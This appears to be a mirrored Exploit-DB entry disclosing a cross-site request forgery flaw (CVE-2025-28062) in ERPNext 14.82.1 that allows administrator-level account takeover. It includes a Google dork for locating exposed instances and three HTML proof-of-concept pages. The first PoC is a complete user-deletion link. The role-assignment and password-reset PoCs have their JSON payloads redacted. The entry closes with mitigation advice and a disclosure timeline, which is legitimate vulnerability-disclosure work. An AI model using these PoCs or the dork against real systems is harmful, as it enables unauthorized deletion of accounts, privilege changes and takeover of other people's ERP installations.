ERPNext 14.82.1 – Account Takeover via Cross-Site Request Forgery (CSRF)

• Exploit Database
• 7 阅读

• 作者： Ahmed Thaiban
  日期： 2025-05-06
• 类别：

  • webapps
  平台：

  • Python
• 来源：https://www.exploit-db.com/exploits/52283/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88

  # Exploit Title: ERPNext 14.82.1 - Account Takeover via Cross-Site Request Forgery (CSRF) # Google Dork: inurl:"/api/method/frappe" # Date: 2025-04-29 # Exploit Author: Ahmed Thaiban (Thvt0ne) # Vendor Homepage: https://erpnext.com # Software Link: https://github.com/frappe/erpnext # Version: <= 14.82.1, 14.74.3 (Tested) # Tested on: Linux (Ubuntu 20.04), Chrome, Firefox. # CVE : CVE-2025-28062 # Category: WebApps   # Description: A Cross-Site Request Forgery (CSRF) vulnerability Lead to Account Takeover exists in ERPNext 14.82.1 and 14.74.3. This flaw allows an attacker to perform unauthorized state-changing operations on behalf of a logged-in administrator without their knowledge or consent.   Affected endpoints include: - /api/method/frappe.desk.reportview.delete_items - /api/method/frappe.desk.form.save.savedocs   Impact: - Deletion of arbitrary users - Unauthorized role assignment - Account takeover via password change   The application fails to enforce CSRF tokens on administrative API requests, violating OWASP recommendations.   ---   # PoC 1: Delete a User   <html> <body> <h2>Delete User</h2> <a href="http://target/api/method/frappe.desk.reportview.delete_items?items=%5B%221%401.com%22%5D&doctype=User"> Click Here </a> </body> </html>   ---   # PoC 2: Assign Role   <html> <body> <h2>Assign Role to User</h2> <a href="http://target/api/method/frappe.desk.form.save.savedocs?doc=REDACTED_JSON&action=Save"> Add Role </a> </body> </html>   ---   # PoC 3: Reset Password   <html> <body> <h2>Reset User Password</h2> <a href="http://target/api/method/frappe.desk.form.save.savedocs?doc=REDACTED_JSON&action=Save"> Reset Password </a> </body> </html>   ---   # Mitigation: - Enforce CSRF protection for all administrative endpoints - Require POST methods for state changes - Mark cookies as SameSite=Strict - Implement re-authentication for critical user changes   ---   # Disclosure Timeline: - 2025-02-09: Vulnerability discovered - 2025-02-10: Reported to Frappe (no response) - 2025-04-29: Public disclosure via CVE + advisory   ---   # Author Contact: LinkedIn: https://linkedin.com/in/ahmedth GitHub: https://github.com/Thvt0ne   # References: - https://owasp.org/www-community/attacks/csrf